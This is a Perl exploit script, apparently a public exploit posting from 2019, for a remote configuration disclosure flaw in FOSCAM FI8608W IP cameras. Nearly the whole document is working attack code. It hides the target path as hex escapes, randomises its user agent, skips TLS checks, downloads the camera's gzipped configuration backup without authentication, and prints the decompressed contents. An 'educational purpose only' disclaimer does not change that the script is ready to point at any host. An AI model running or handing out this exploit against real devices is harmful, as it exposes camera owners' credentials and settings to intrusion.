Share
#!/usr/bin/perl -w  
#  
# FOSCAM FI8608W Camera Remote Configuration Disclosure  
#  
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>  
#  
#  
# Disclaimer:  
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.   
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages   
# caused by direct or indirect use of the information or functionality provided by these programs.   
# The author or any Internet provider bears NO responsibility for content or misuse of these programs   
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,   
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's   
# responsibility.  
#   
# Use them at your own risk!   
#   
# (Dont do anything without permissions)  
#  
#   
use strict;  
use HTTP::Request;  
use LWP::UserAgent;  
use WWW::UserAgent::Random;  
use Gzip::Faster;  
$| = 1;  
binmode(STDOUT, ":utf8");  
my $host = shift || 'https://192.168.1.1/'; # Full path url to the store  
print "\033[2J"; #clear the screen  
print "\033[0;0H"; #jump to 0,0  
print "[ FOSCAM FI8608W Camera Remote Configuration Disclosure\n";  
print "[ =====================================================\n";  
print "[ Xploit by: Todor Donev 2019 <todor.donev\@gmail.com>\n";  
print "[ e.g. perl $0 https://target:port/\n" and exit if ($host !~ m/^http/);  
print "[ Initializing the browser\n";  
my $user_agent = rand_ua("browsers");  
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });  
$browser->timeout(30);  
$browser->agent($user_agent);  
my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";  
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);   
my $response = $browser->request($request) or die "[ Exploit Failed: $!";  
print "[ 401 Unauthorized!\n" and exit if ($response->code eq '401');  
print "[ Server: ", $response->header('Server'), "\n";  
my $gzip = $response->content();  
print "[\n[ Configuration Dump:\n[\n";  
print "[ ", $_, "\n" for split(/\n/,gunzip($gzip));